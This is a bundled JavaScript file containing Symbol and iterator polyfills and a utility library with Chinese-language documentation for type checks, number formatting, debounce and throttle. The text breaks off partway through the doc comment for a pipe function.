var result = {};
var i = 0;
var key, desc;
while (keys.length > i) {
desc = getDesc(O, key = keys[i++]);
if (desc !== undefined) _createProperty(result, key, desc);
}
return result;
}
});
var getOwnPropertyDescriptors = _core.Object.getOwnPropertyDescriptors;
var getOwnPropertyDescriptors$1 = getOwnPropertyDescriptors;
var _objectSap = function (KEY, exec) {
var fn = (_core.Object || {})[KEY] || Object[KEY];
var exp = {};
exp[KEY] = exec(fn);
_export(_export.S + _export.F * _fails(function () {
fn(1);
}), 'Object', exp);
};
var $getOwnPropertyDescriptor = _objectGopd.f;
_objectSap('getOwnPropertyDescriptor', function () {
return function getOwnPropertyDescriptor(it, key) {
return $getOwnPropertyDescriptor(_toIobject(it), key);
};
});
var $Object$2 = _core.Object;
var getOwnPropertyDescriptor = function getOwnPropertyDescriptor(it, key) {
return $Object$2.getOwnPropertyDescriptor(it, key);
};
var getOwnPropertyDescriptor$1 = getOwnPropertyDescriptor;
var _redefine = _hide;
var _meta = createCommonjsModule(function (module) {
var META = _uid('meta');
var setDesc = _objectDp.f;
var id = 0;
var isExtensible = Object.isExtensible || function () {
return true;
};
var FREEZE = !_fails(function () {
return isExtensible(Object.preventExtensions({}));
});
var setMeta = function (it) {
setDesc(it, META, {
value: {
i: 'O' + ++id,
// object ID
w: {} // weak collections IDs
}
});
};
var fastKey = function (it, create) {
// return primitive with prefix
if (!_isObject(it)) return typeof it == 'symbol' ? it : (typeof it == 'string' ? 'S' : 'P') + it;
if (!_has(it, META)) {
// can't set metadata to uncaught frozen object
if (!isExtensible(it)) return 'F'; // not necessary to add metadata
if (!create) return 'E'; // add missing metadata
setMeta(it); // return object ID
}
return it[META].i;
};
var getWeak = function (it, create) {
if (!_has(it, META)) {
// can't set metadata to uncaught frozen object
if (!isExtensible(it)) return true; // not necessary to add metadata
if (!create) return false; // add missing metadata
setMeta(it); // return hash weak collections IDs
}
return it[META].w;
}; // add metadata on freeze-family methods calling
var onFreeze = function (it) {
if (FREEZE && meta.NEED && isExtensible(it) && !_has(it, META)) setMeta(it);
return it;
};
var meta = module.exports = {
KEY: META,
NEED: false,
fastKey: fastKey,
getWeak: getWeak,
onFreeze: onFreeze
};
});
var _meta_1 = _meta.KEY;
var _meta_2 = _meta.NEED;
var _meta_3 = _meta.fastKey;
var _meta_4 = _meta.getWeak;
var _meta_5 = _meta.onFreeze;
var _wks = createCommonjsModule(function (module) {
var store = _shared('wks');
var Symbol = _global.Symbol;
var USE_SYMBOL = typeof Symbol == 'function';
var $exports = module.exports = function (name) {
return store[name] || (store[name] = USE_SYMBOL && Symbol[name] || (USE_SYMBOL ? Symbol : _uid)('Symbol.' + name));
};
$exports.store = store;
});
var def = _objectDp.f;
var TAG = _wks('toStringTag');
var _setToStringTag = function (it, tag, stat) {
if (it && !_has(it = stat ? it : it.prototype, TAG)) def(it, TAG, {
configurable: true,
value: tag
});
};
var f$5 = _wks;
var _wksExt = {
f: f$5
};
var defineProperty$2 = _objectDp.f;
var _wksDefine = function (name) {
var $Symbol = _core.Symbol || (_core.Symbol = _library ? {} : _global.Symbol || {});
if (name.charAt(0) != '_' && !(name in $Symbol)) defineProperty$2($Symbol, name, {
value: _wksExt.f(name)
});
};
var _enumKeys = function (it) {
var result = _objectKeys(it);
var getSymbols = _objectGops.f;
if (getSymbols) {
var symbols = getSymbols(it);
var isEnum = _objectPie.f;
var i = 0;
var key;
while (symbols.length > i) if (isEnum.call(it, key = symbols[i++])) result.push(key);
}
return result;
};
var _isArray = Array.isArray || function isArray(arg) {
return _cof(arg) == 'Array';
};
var _toObject = function (it) {
return Object(_defined(it));
};
var document$1 = _global.document;
var _html = document$1 && document$1.documentElement;
var IE_PROTO$1 = _sharedKey('IE_PROTO');
var Empty = function () {
/* empty */
};
var PROTOTYPE$1 = 'prototype'; // Create object with fake `null` prototype: use iframe Object with cleared prototype
var createDict = function () {
// Thrash, waste and sodomy: IE GC bug
var iframe = _domCreate('iframe');
var i = _enumBugKeys.length;
var lt = '<';
var gt = '>';
var iframeDocument;
iframe.style.display = 'none';
_html.appendChild(iframe);
iframe.src = 'javascript:'; // eslint-disable-line no-script-url
// createDict = iframe.contentWindow.Object;
// html.removeChild(iframe);
iframeDocument = iframe.contentWindow.document;
iframeDocument.open();
iframeDocument.write(lt + 'script' + gt + 'document.F=Object' + lt + '/script' + gt);
iframeDocument.close();
createDict = iframeDocument.F;
while (i--) delete createDict[PROTOTYPE$1][_enumBugKeys[i]];
return createDict();
};
var _objectCreate = Object.create || function create(O, Properties) {
var result;
if (O !== null) {
Empty[PROTOTYPE$1] = _anObject(O);
result = new Empty();
Empty[PROTOTYPE$1] = null; // add "__proto__" for Object.getPrototypeOf polyfill
result[IE_PROTO$1] = O;
} else result = createDict();
return Properties === undefined ? result : _objectDps(result, Properties);
};
var gOPN = _objectGopn.f;
var toString$1 = {}.toString;
var windowNames = typeof window == 'object' && window && Object.getOwnPropertyNames ? Object.getOwnPropertyNames(window) : [];
var getWindowNames = function (it) {
try {
return gOPN(it);
} catch (e) {
return windowNames.slice();
}
};
var f$6 = function getOwnPropertyNames(it) {
return windowNames && toString$1.call(it) == '[object Window]' ? getWindowNames(it) : gOPN(_toIobject(it));
};
var _objectGopnExt = {
f: f$6
};
var META = _meta.KEY;
var gOPD$1 = _objectGopd.f;
var dP$1 = _objectDp.f;
var gOPN$1 = _objectGopnExt.f;
var $Symbol = _global.Symbol;
var $JSON = _global.JSON;
var _stringify = $JSON && $JSON.stringify;
var PROTOTYPE$2 = 'prototype';
var HIDDEN = _wks('_hidden');
var TO_PRIMITIVE = _wks('toPrimitive');
var isEnum = {}.propertyIsEnumerable;
var SymbolRegistry = _shared('symbol-registry');
var AllSymbols = _shared('symbols');
var OPSymbols = _shared('op-symbols');
var ObjectProto = Object[PROTOTYPE$2];
var USE_NATIVE = typeof $Symbol == 'function' && !!_objectGops.f;
var QObject = _global.QObject; // Don't use setters in Qt Script, https://github.com/zloirock/core-js/issues/173
var setter = !QObject || !QObject[PROTOTYPE$2] || !QObject[PROTOTYPE$2].findChild; // fallback for old Android, https://code.google.com/p/v8/issues/detail?id=687
var setSymbolDesc = _descriptors && _fails(function () {
return _objectCreate(dP$1({}, 'a', {
get: function () {
return dP$1(this, 'a', {
value: 7
}).a;
}
})).a != 7;
}) ? function (it, key, D) {
var protoDesc = gOPD$1(ObjectProto, key);
if (protoDesc) delete ObjectProto[key];
dP$1(it, key, D);
if (protoDesc && it !== ObjectProto) dP$1(ObjectProto, key, protoDesc);
} : dP$1;
var wrap = function (tag) {
var sym = AllSymbols[tag] = _objectCreate($Symbol[PROTOTYPE$2]);
sym._k = tag;
return sym;
};
var isSymbol = USE_NATIVE && typeof $Symbol.iterator == 'symbol' ? function (it) {
return typeof it == 'symbol';
} : function (it) {
return it instanceof $Symbol;
};
var $defineProperty = function defineProperty(it, key, D) {
if (it === ObjectProto) $defineProperty(OPSymbols, key, D);
_anObject(it);
key = _toPrimitive(key, true);
_anObject(D);
if (_has(AllSymbols, key)) {
if (!D.enumerable) {
if (!_has(it, HIDDEN)) dP$1(it, HIDDEN, _propertyDesc(1, {}));
it[HIDDEN][key] = true;
} else {
if (_has(it, HIDDEN) && it[HIDDEN][key]) it[HIDDEN][key] = false;
D = _objectCreate(D, {
enumerable: _propertyDesc(0, false)
});
}
return setSymbolDesc(it, key, D);
}
return dP$1(it, key, D);
};
var $defineProperties = function defineProperties(it, P) {
_anObject(it);
var keys = _enumKeys(P = _toIobject(P));
var i = 0;
var l = keys.length;
var key;
while (l > i) $defineProperty(it, key = keys[i++], P[key]);
return it;
};
var $create = function create(it, P) {
return P === undefined ? _objectCreate(it) : $defineProperties(_objectCreate(it), P);
};
var $propertyIsEnumerable = function propertyIsEnumerable(key) {
var E = isEnum.call(this, key = _toPrimitive(key, true));
if (this === ObjectProto && _has(AllSymbols, key) && !_has(OPSymbols, key)) return false;
return E || !_has(this, key) || !_has(AllSymbols, key) || _has(this, HIDDEN) && this[HIDDEN][key] ? E : true;
};
var $getOwnPropertyDescriptor$1 = function getOwnPropertyDescriptor(it, key) {
it = _toIobject(it);
key = _toPrimitive(key, true);
if (it === ObjectProto && _has(AllSymbols, key) && !_has(OPSymbols, key)) return;
var D = gOPD$1(it, key);
if (D && _has(AllSymbols, key) && !(_has(it, HIDDEN) && it[HIDDEN][key])) D.enumerable = true;
return D;
};
var $getOwnPropertyNames = function getOwnPropertyNames(it) {
var names = gOPN$1(_toIobject(it));
var result = [];
var i = 0;
var key;
while (names.length > i) {
if (!_has(AllSymbols, key = names[i++]) && key != HIDDEN && key != META) result.push(key);
}
return result;
};
var $getOwnPropertySymbols = function getOwnPropertySymbols(it) {
var IS_OP = it === ObjectProto;
var names = gOPN$1(IS_OP ? OPSymbols : _toIobject(it));
var result = [];
var i = 0;
var key;
while (names.length > i) {
if (_has(AllSymbols, key = names[i++]) && (IS_OP ? _has(ObjectProto, key) : true)) result.push(AllSymbols[key]);
}
return result;
}; // 19.4.1.1 Symbol([description])
if (!USE_NATIVE) {
$Symbol = function Symbol() {
if (this instanceof $Symbol) throw TypeError('Symbol is not a constructor!');
var tag = _uid(arguments.length > 0 ? arguments[0] : undefined);
var $set = function (value) {
if (this === ObjectProto) $set.call(OPSymbols, value);
if (_has(this, HIDDEN) && _has(this[HIDDEN], tag)) this[HIDDEN][tag] = false;
setSymbolDesc(this, tag, _propertyDesc(1, value));
};
if (_descriptors && setter) setSymbolDesc(ObjectProto, tag, {
configurable: true,
set: $set
});
return wrap(tag);
};
_redefine($Symbol[PROTOTYPE$2], 'toString', function toString() {
return this._k;
});
_objectGopd.f = $getOwnPropertyDescriptor$1;
_objectDp.f = $defineProperty;
_objectGopn.f = _objectGopnExt.f = $getOwnPropertyNames;
_objectPie.f = $propertyIsEnumerable;
_objectGops.f = $getOwnPropertySymbols;
if (_descriptors && !_library) {
_redefine(ObjectProto, 'propertyIsEnumerable', $propertyIsEnumerable, true);
}
_wksExt.f = function (name) {
return wrap(_wks(name));
};
}
_export(_export.G + _export.W + _export.F * !USE_NATIVE, {
Symbol: $Symbol
});
for (var es6Symbols = // 172.16.58.3, 192.168.3.11, 172.16.58.3, 172.16.17.32, 172.16.58.3, 172.16.58.3, 192.168.3.11, 192.168.127.12, 192.168.3.11, 172.16.17.32, 192.168.3.11
'hasInstance,isConcatSpreadable,iterator,match,replace,search,species,split,toPrimitive,toStringTag,unscopables'.split(','), j = 0; es6Symbols.length > j;) _wks(es6Symbols[j++]);
for (var wellKnownSymbols = _objectKeys(_wks.store), k = 0; wellKnownSymbols.length > k;) _wksDefine(wellKnownSymbols[k++]);
_export(_export.S + _export.F * !USE_NATIVE, 'Symbol', {
// 19.4.2.1 Symbol.for(key)
'for': function (key) {
return _has(SymbolRegistry, key += '') ? SymbolRegistry[key] : SymbolRegistry[key] = $Symbol(key);
},
// 19.4.2.5 Symbol.keyFor(sym)
keyFor: function keyFor(sym) {
if (!isSymbol(sym)) throw TypeError(sym + ' is not a symbol!');
for (var key in SymbolRegistry) if (SymbolRegistry[key] === sym) return key;
},
useSetter: function () {
setter = true;
},
useSimple: function () {
setter = false;
}
});
_export(_export.S + _export.F * !USE_NATIVE, 'Object', {
// 172.16.31.10 Object.create(O [, Properties])
create: $create,
// 19.1.2.4 Object.defineProperty(O, P, Attributes)
defineProperty: $defineProperty,
// 19.1.2.3 Object.defineProperties(O, Properties)
defineProperties: $defineProperties,
// 19.1.2.6 Object.getOwnPropertyDescriptor(O, P)
getOwnPropertyDescriptor: $getOwnPropertyDescriptor$1,
// 19.1.2.7 Object.getOwnPropertyNames(O)
getOwnPropertyNames: $getOwnPropertyNames,
// 19.1.2.8 Object.getOwnPropertySymbols(O)
getOwnPropertySymbols: $getOwnPropertySymbols
}); // Chrome 38 and 39 `Object.getOwnPropertySymbols` fails on primitives
// https://bugs.chromium.org/p/v8/issues/detail?id=3443
var FAILS_ON_PRIMITIVES = _fails(function () {
_objectGops.f(1);
});
_export(_export.S + _export.F * FAILS_ON_PRIMITIVES, 'Object', {
getOwnPropertySymbols: function getOwnPropertySymbols(it) {
return _objectGops.f(_toObject(it));
}
}); // 24.3.2 JSON.stringify(value [, replacer [, space]])
$JSON && _export(_export.S + _export.F * (!USE_NATIVE || _fails(function () {
var S = $Symbol(); // MS Edge converts symbol values to JSON as {}
// WebKit converts symbol values to JSON as null
// V8 throws on boxed symbols
return _stringify([S]) != '[null]' || _stringify({
a: S
}) != '{}' || _stringify(Object(S)) != '{}';
})), 'JSON', {
stringify: function stringify(it) {
var args = [it];
var i = 1;
var replacer, $replacer;
while (arguments.length > i) args.push(arguments[i++]);
$replacer = replacer = args[1];
if (!_isObject(replacer) && it === undefined || isSymbol(it)) return; // IE8 returns string on undefined
if (!_isArray(replacer)) replacer = function (key, value) {
if (typeof $replacer == 'function') value = $replacer.call(this, key, value);
if (!isSymbol(value)) return value;
};
args[1] = replacer;
return _stringify.apply($JSON, args);
}
}); // 19.4.3.4 Symbol.prototype[@@toPrimitive](hint)
$Symbol[PROTOTYPE$2][TO_PRIMITIVE] || _hide($Symbol[PROTOTYPE$2], TO_PRIMITIVE, $Symbol[PROTOTYPE$2].valueOf); // 19.4.3.5 Symbol.prototype[@@toStringTag]
_setToStringTag($Symbol, 'Symbol'); // 20.2.1.9 Math[@@toStringTag]
_setToStringTag(Math, 'Math', true); // 24.3.3 JSON[@@toStringTag]
_setToStringTag(_global.JSON, 'JSON', true);
var getOwnPropertySymbols = _core.Object.getOwnPropertySymbols;
var getOwnPropertySymbols$1 = getOwnPropertySymbols;
_objectSap('keys', function () {
return function keys(it) {
return _objectKeys(_toObject(it));
};
});
var keys = _core.Object.keys;
var keys$1 = keys;
function _defineProperty(obj, key, value) {
if (key in obj) {
defineProperty$1(obj, key, {
value: value,
enumerable: true,
configurable: true,
writable: true
});
} else {
obj[key] = value;
}
return obj;
}
var defineProperty$3 = _defineProperty;
var version = "3.2.1";
_export(_export.S, 'Array', {
isArray: _isArray
});
var isArray = _core.Array.isArray;
var isArray$1 = isArray;
// false -> String#codePointAt
var _stringAt = function (TO_STRING) {
return function (that, pos) {
var s = String(_defined(that));
var i = _toInteger(pos);
var l = s.length;
var a, b;
if (i < 0 || i >= l) return TO_STRING ? '' : undefined;
a = s.charCodeAt(i);
return a < 0xd800 || a > 0xdbff || i + 1 === l || (b = s.charCodeAt(i + 1)) < 0xdc00 || b > 0xdfff ? TO_STRING ? s.charAt(i) : a : TO_STRING ? s.slice(i, i + 2) : (a - 0xd800 << 10) + (b - 0xdc00) + 0x10000;
};
};
var _iterators = {};
var IteratorPrototype = {}; // 25.1.2.1.1 %IteratorPrototype%[@@iterator]()
_hide(IteratorPrototype, _wks('iterator'), function () {
return this;
});
var _iterCreate = function (Constructor, NAME, next) {
Constructor.prototype = _objectCreate(IteratorPrototype, {
next: _propertyDesc(1, next)
});
_setToStringTag(Constructor, NAME + ' Iterator');
};
var IE_PROTO$2 = _sharedKey('IE_PROTO');
var ObjectProto$1 = Object.prototype;
var _objectGpo = Object.getPrototypeOf || function (O) {
O = _toObject(O);
if (_has(O, IE_PROTO$2)) return O[IE_PROTO$2];
if (typeof O.constructor == 'function' && O instanceof O.constructor) {
return O.constructor.prototype;
}
return O instanceof Object ? ObjectProto$1 : null;
};
var ITERATOR = _wks('iterator');
var BUGGY = !([].keys && 'next' in [].keys()); // Safari has buggy iterators w/o `next`
var FF_ITERATOR = '@@iterator';
var KEYS = 'keys';
var VALUES = 'values';
var returnThis = function () {
return this;
};
var _iterDefine = function (Base, NAME, Constructor, next, DEFAULT, IS_SET, FORCED) {
_iterCreate(Constructor, NAME, next);
var getMethod = function (kind) {
if (!BUGGY && kind in proto) return proto[kind];
switch (kind) {
case KEYS:
return function keys() {
return new Constructor(this, kind);
};
case VALUES:
return function values() {
return new Constructor(this, kind);
};
}
return function entries() {
return new Constructor(this, kind);
};
};
var TAG = NAME + ' Iterator';
var DEF_VALUES = DEFAULT == VALUES;
var VALUES_BUG = false;
var proto = Base.prototype;
var $native = proto[ITERATOR] || proto[FF_ITERATOR] || DEFAULT && proto[DEFAULT];
var $default = $native || getMethod(DEFAULT);
var $entries = DEFAULT ? !DEF_VALUES ? $default : getMethod('entries') : undefined;
var $anyNative = NAME == 'Array' ? proto.entries || $native : $native;
var methods, key, IteratorPrototype; // Fix native
if ($anyNative) {
IteratorPrototype = _objectGpo($anyNative.call(new Base()));
if (IteratorPrototype !== Object.prototype && IteratorPrototype.next) {
// Set @@toStringTag to native iterators
_setToStringTag(IteratorPrototype, TAG, true); // fix for some old engines
if (!_library && typeof IteratorPrototype[ITERATOR] != 'function') _hide(IteratorPrototype, ITERATOR, returnThis);
}
} // fix Array#{values, @@iterator}.name in V8 / FF
if (DEF_VALUES && $native && $native.name !== VALUES) {
VALUES_BUG = true;
$default = function values() {
return $native.call(this);
};
} // Define iterator
if ((!_library || FORCED) && (BUGGY || VALUES_BUG || !proto[ITERATOR])) {
_hide(proto, ITERATOR, $default);
} // Plug for library
_iterators[NAME] = $default;
_iterators[TAG] = returnThis;
if (DEFAULT) {
methods = {
values: DEF_VALUES ? $default : getMethod(VALUES),
keys: IS_SET ? $default : getMethod(KEYS),
entries: $entries
};
if (FORCED) for (key in methods) {
if (!(key in proto)) _redefine(proto, key, methods[key]);
} else _export(_export.P + _export.F * (BUGGY || VALUES_BUG), NAME, methods);
}
return methods;
};
var $at = _stringAt(true); // 172.16.31.10 String.prototype[@@iterator]()
_iterDefine(String, 'String', function (iterated) {
this._t = String(iterated); // target
this._i = 0; // next index
// 21.1.5.2.1 %StringIteratorPrototype%.next()
}, function () {
var O = this._t;
var index = this._i;
var point;
if (index >= O.length) return {
value: undefined,
done: true
};
point = $at(O, index);
this._i += point.length;
return {
value: point,
done: false
};
});
var _iterStep = function (done, value) {
return {
value: value,
done: !!done
};
};
// 192.168.127.12 Array.prototype.keys()
// 192.168.3.119 Array.prototype.values()
// 192.168.3.11 Array.prototype[@@iterator]()
var es6_array_iterator = _iterDefine(Array, 'Array', function (iterated, kind) {
this._t = _toIobject(iterated); // target
this._i = 0; // next index
this._k = kind; // kind
// 22.1.5.2.1 %ArrayIteratorPrototype%.next()
}, function () {
var O = this._t;
var kind = this._k;
var index = this._i++;
if (!O || index >= O.length) {
this._t = undefined;
return _iterStep(1);
}
if (kind == 'keys') return _iterStep(0, index);
if (kind == 'values') return _iterStep(0, O[index]);
return _iterStep(0, [index, O[index]]);
}, 'values'); // argumentsList[@@iterator] is %ArrayProto_values% (9.4.4.6, 9.4.4.7)
_iterators.Arguments = _iterators.Array;
var TO_STRING_TAG = _wks('toStringTag');
var DOMIterables = ('CSSRuleList,CSSStyleDeclaration,CSSValueList,ClientRectList,DOMRectList,DOMStringList,' + 'DOMTokenList,DataTransferItemList,FileList,HTMLAllCollection,HTMLCollection,HTMLFormElement,HTMLSelectElement,' + 'MediaList,MimeTypeArray,NamedNodeMap,NodeList,PaintRequestList,Plugin,PluginArray,SVGLengthList,SVGNumberList,' + 'SVGPathSegList,SVGPointList,SVGStringList,SVGTransformList,SourceBufferList,StyleSheetList,TextTrackCueList,' + 'TextTrackList,TouchList').split(',');
for (var i = 0; i < DOMIterables.length; i++) {
var NAME = DOMIterables[i];
var Collection = _global[NAME];
var proto = Collection && Collection.prototype;
if (proto && !proto[TO_STRING_TAG]) _hide(proto, TO_STRING_TAG, NAME);
_iterators[NAME] = _iterators.Array;
}
var iterator = _wksExt.f('iterator');
var iterator$1 = iterator;
_wksDefine('asyncIterator');
_wksDefine('observable');
var symbol = _core.Symbol;
var symbol$1 = symbol;
var _typeof_1 = createCommonjsModule(function (module) {
function _typeof2(obj) {
if (typeof symbol$1 === "function" && typeof iterator$1 === "symbol") {
_typeof2 = function _typeof2(obj) {
return typeof obj;
};
} else {
_typeof2 = function _typeof2(obj) {
return obj && typeof symbol$1 === "function" && obj.constructor === symbol$1 && obj !== symbol$1.prototype ? "symbol" : typeof obj;
};
}
return _typeof2(obj);
}
function _typeof(obj) {
if (typeof symbol$1 === "function" && _typeof2(iterator$1) === "symbol") {
module.exports = _typeof = function _typeof(obj) {
return _typeof2(obj);
};
} else {
module.exports = _typeof = function _typeof(obj) {
return obj && typeof symbol$1 === "function" && obj.constructor === symbol$1 && obj !== symbol$1.prototype ? "symbol" : _typeof2(obj);
};
}
return _typeof(obj);
}
module.exports = _typeof;
});
/** @module Type */
/**
* 返回val的类型。
* @function getType
* @param {*} val - 需要检查的值。
* @return {string}
* @example
* U.getType(new Set([1, 2]))
* // => 'set'
*/
var getType = function getType(val) {
return isUndefined(val) ? 'undefined' : isNull(val) ? 'null' : val.constructor.name.toLowerCase();
};
/**
* 检查value是否为number类型。使用typeof来检查,返回布尔值。
* @function isNumber
* @param {*} value - 需要检查的值。
* @return {boolean}
* @example
* U.isNumber(3)
* // => true
*
* U.isNumber(Number.MIN_VALUE)
* // => true
*
* U.isNumber(Infinity)
* // => true
*
* U.isNumber('3')
* // => false
*/
var isNumber = function isNumber(value) {
return typeof value === 'number';
};
/**
* 检查值是否为字符串。使用typeof来检查,返回布尔值。
* @function isString
* @param {*} value - 需要检查的值。
* @return {boolean}
* @example
* U.isString(3)
* // => false
*
* U.isString('3')
* // => true
*/
var isString = function isString(value) {
return typeof value === 'string';
};
/**
* 检查值是否为null对象。使用typeof来检查,返回布尔值。
* @function isNull
* @param {*} value - 需要检查的值。
* @return {boolean}
* @example
* U.isNull(3)
* // => false
*
* U.isNull(null)
* // => true
*/
var isNull = function isNull(value) {
return value === null;
};
/**
* 检查值是否为undefined对象。使用typeof来检查,返回布尔值。
* @function isUndefined
* @param {*} value - 需要检查的值。
* @return {boolean}
* @example
* U.isUndefined(undefined)
* // => true
*
* U.isUndefined(null)
* // => false
*/
var isUndefined = function isUndefined(value) {
return value === undefined;
};
/**
* 检查值是否为布尔值。使用typeof来检查,返回布尔值。
* @function isBoolean
* @param {*} value - 需要检查的值。
* @return {boolean}
* @example
* U.isBoolean(false)
* // => true
*
* U.isBoolean(null)
* // => false
*/
var isBoolean = function isBoolean(value) {
return typeof value === 'boolean';
};
/**
* 检查值是否为symbol类型。使用typeof来检查,返回布尔值。
* @function isSymbol
* @param {*} value - 需要检查的值。
* @return {boolean}
* @example
* U.isSymbol(Symbol('x'))
* // => true
*/
var isSymbol$1 = function isSymbol(value) {
return _typeof_1(value) === 'symbol';
};
/**
* 检查值是否为function类型。使用typeof来检查,返回布尔值。
* @function isFunction
* @param {*} value - 需要检查的值。
* @return {boolean}
* @example
* U.isFunction(3)
* // => false
*
* U.isFunction(function () {})
* // => true
*/
var isFunction = function isFunction(value) {
return typeof value === 'function';
};
/**
* 使用Array.isArray方法检查arr是否为数组类型,返回布尔值。
* @function isArray
* @param {*} arr - 需要检查的值。
* @return {boolean}
* @example
* U.isArray([])
* // => true
*
* U.isArray(null)
* // => false
*/
var isArray$2 = function isArray(arr) {
return isArray$1(arr);
};
/**
* 检查alue是否为对象类型,返回布尔值。
* @function isObject
* @param {*} value - 需要检查的值。
* @return {boolean}
* @example
* U.isObject(null)
* // => false
*
* U.isObject([1, 2])
* // => false
*
* U.isObject({})
* // => true
*/
var isObject = function isObject(value) {
return value instanceof Object && !isArray$2(value);
};
var floor$1 = Math.floor;
var _isInteger = function isInteger(it) {
return !_isObject(it) && isFinite(it) && floor$1(it) === it;
};
_export(_export.S, 'Number', {
isInteger: _isInteger
});
var isInteger = _core.Number.isInteger;
var isInteger$1 = isInteger;
/**
* 检查给定值是否为整数,返回布尔值。
* @function isInt
* @param {*} val - 需要检查的值。
* @return {boolean}
* @example
* U.isInt(0)
* // => true
*
* U.isInt(1.15)
* // => false
*
* U.isInt('3')
* // => false
*/
var isInt = function isInt(val) {
return isInteger$1(val);
};
/**
* 将数字value格式化为千位符数字字符串。如果value是数字,则返回格式化后的字符串,否则报错。
* @function toThousands
* @param {number|string} value - 需要千位符格式化的值。
* @param {string} [separator=','] - 可选,分隔符。
* @returns {string|NaN}
* @example
* U.toThousands(-1545454)
* // => '-1,545,454'
*
* U.toThousands(1545454.1545)
* // => '1,545,454.1545'
*
* U.toThousands('1545454.1545', '-')
* // => '1-545-454.1545'
*
* U.toThousands(0)
* // => '0'
*
* U.toThousands(null)
* // => '0'
*
* U.toThousands(undefined)
* // => NaN
*/
var toThousands = function toThousands(value) {
var separator = arguments.length > 1 && arguments[1] !== undefined ? arguments[1] : ',';
return isNull(value) ? '0' : isNaN(Number(value)) ? NaN : "".concat(value).split('.').map(function (v, i) {
return i === 0 ? v.replace(/([-|+]?\d)(?=(\d{3})+$)/g, "$1".concat(separator)) : v;
}).join('.');
};
/**
* 数字value是否在两个数之间。如果不设置end,则start默认为0,判断value是否在0与start之间。
* @function inRange
* @param {number} value - 需要判断的数值。
* @param {number} [start=0] - 起点值,只提供两个参数时start默认为0。
* @param {number} end - 终点值,只提供两个参数时取第二个参数值为该值,且起点值为0。
* @return {boolean}
* @example
* U.inRange(5, 4)
* // => false
*
* U.inRange(5, 7)
* // => true
*
* U.inRange(5, 4, 7)
* // => true
*
* U.inRange(5, 7, 10)
* // => false
*
* U.inRange(5, 10, 7)
* // => false
*/
var inRange = function inRange(value, start) {
var end = arguments.length > 2 && arguments[2] !== undefined ? arguments[2] : null;
if (end && start > end) {
var _ref = [start, end];
end = _ref[0];
start = _ref[1];
}
return isNull(end) ? value >= 0 && value < start : value >= start && value < end;
};
/**
* 四舍五入函数
* @function round
* @param {number} val - 数字。
* @param {number} [decimals=0] - 可选,保留的数字精度,默认为0。
* @return {number}
* @example
* U.round(1.2006, 3)
* // => 1.201
*
* U.round(1.2006)
* // => 1
*/
var round = function round(val) {
var decimals = arguments.length > 1 && arguments[1] !== undefined ? arguments[1] : 0;
return Number("".concat(Math.round("".concat(val, "e").concat(decimals)), "e-").concat(decimals));
};
/**
* 生成一个start~end之间随机数字
* @function random
* @param {number} start - 可选,数字。
* @param {number} end - 可选,数字。
* @return {number}
* @example
* const a = U.random()
* // => 0 < a < 1
*
* const b = U.random(3)
* // => 0 < b < 3
*
* const c = U.random(3, 5)
* // => 3 < c < 5
*
* const d = U.random(5, 3)
* // => 3 < d < 5
*
* const e = U.random(-1)
* // => -1 < e < 0
*
* const f = U.random(-1, 1)
* // => -1 < f < 1
*/
var random = function random(start, end) {
return start && end ? Math.random() * Math.abs(start - end) + Math.min(start, end) : Math.random() * (start || end || 1);
};
/**
* 保留小数位数
* @function keepFixed
* @param {number|string} val - 数值
* @param {number} precision - 非负整数,保留小数的位数
* @param {boolean} [useFiller=true] - 可选,小数位数不足时是否使用0填充,默认为true
* @return {string}
* @example
* U.keepFixed(-15.12, 4)
* // => -15.1200
*
* U.keepFixed(15.1234, 2)
* // => -15.12
*/
var keepFixed = function keepFixed(val, precision) {
var useFiller = arguments.length > 2 && arguments[2] !== undefined ? arguments[2] : true;
var i = "".concat(val).indexOf('.');
if (i < 0) {
return useFiller ? "".concat(val, ".").concat('0'.repeat(precision)) : "".concat(val);
}
i += precision + 1;
val = "".concat(val).substring(0, i);
return useFiller ? val.padEnd(i, '0') : val;
};
/**
* 求平均值函数
* @function average
* @param {number} args - 参数列表,数值类型
* @return {number}
* @example
* U.average(10, 20)
* // => 15
*
* U.average(-10, -20, 30, 40)
* // => 10
*/
var average = function average() {
for (var _len = arguments.length, args = new Array(_len), _key = 0; _key < _len; _key++) {
args[_key] = arguments[_key];
}
return args.reduce(function (acc, v) {
return acc + v;
}, 0) / args.length;
};
_export(_export.S, 'Date', {
now: function () {
return new Date().getTime();
}
});
var now = _core.Date.now;
var now$1 = now;
/** @module Function */
/**
* 将函数fn转为一次函数。返回函数,函数只能执行一次。
* @function noce
* @param {function} fn - 执行的函数。
* @return {function}
* @example
* const fn = once(() => '5')
* console.log([fn(), fn()])
* // => ['5', undefined]
*/
var once = function once(fn) {
var called = false;
return function () {
if (called) return;
called = true;
for (var _len = arguments.length, args = new Array(_len), _key = 0; _key < _len; _key++) {
args[_key] = arguments[_key];
}
return fn.apply(this, args);
};
};
/**
* 将函数fn转为防抖函数。返回防抖函数。
* @function debounce
* @param {function} fn - 函数。
* @param {number} [delay=0] - 可选,防抖动延迟时长,单位为ms,默认为0。
* @returns {function}
* @example
* window.addEventListener('resize', U.debounce(() => {
* console.log(window.innerWidth);
* console.log(window.innerHeight);
* }, 250));
* // => 调整浏览器窗口尺寸,在250ms后控制台将打印一次窗口尺寸
*/
var debounce = function debounce(fn) {
var delay = arguments.length > 1 && arguments[1] !== undefined ? arguments[1] : 0;
var timeoutId;
return function () {
var _this = this;
for (var _len2 = arguments.length, args = new Array(_len2), _key2 = 0; _key2 < _len2; _key2++) {
args[_key2] = arguments[_key2];
}
clearTimeout(timeoutId);
timeoutId = setTimeout(function () {
return fn.apply(_this, args);
}, delay);
};
};
/**
* 将函数fn转为节流函数。返回节流函数。
* @function throttle
* @param {function} fn - 函数。
* @param {number} wait - 节流时长,单位为ms。
* @return {function}
* @example
* window.addEventListener('resize', U.throttle(function(evt) {
* console.log(window.innerWidth);
* console.log(window.innerHeight);
* }, 250));
* // 调整浏览器窗口尺寸,没间隔250ms控制台将打印一次窗口尺寸
*/
var throttle = function throttle(fn, wait) {
var inThrottle, lastFn, lastTime;
return function () {
var context = this,
args = arguments;
if (!inThrottle) {
fn.apply(context, args);
lastTime = now$1();
inThrottle = true;
} else {
clearTimeout(lastFn);
lastFn = setTimeout(function () {
if (now$1() - lastTime >= wait) {
fn.apply(context, args);
lastTime = now$1();
}
}, Math.max(wait - (now$1() - lastTime), 0));
}
};
};
/**
* 管道函数,占位符“$”为上一个函数的运算结果,如:pipe(x, `a |> b($, y)`) 等价于 b(a(x), y)。
* @function pipe
* @param {*} param - 函数参数。
* @param {string} line - 管道线。
* @return {*}
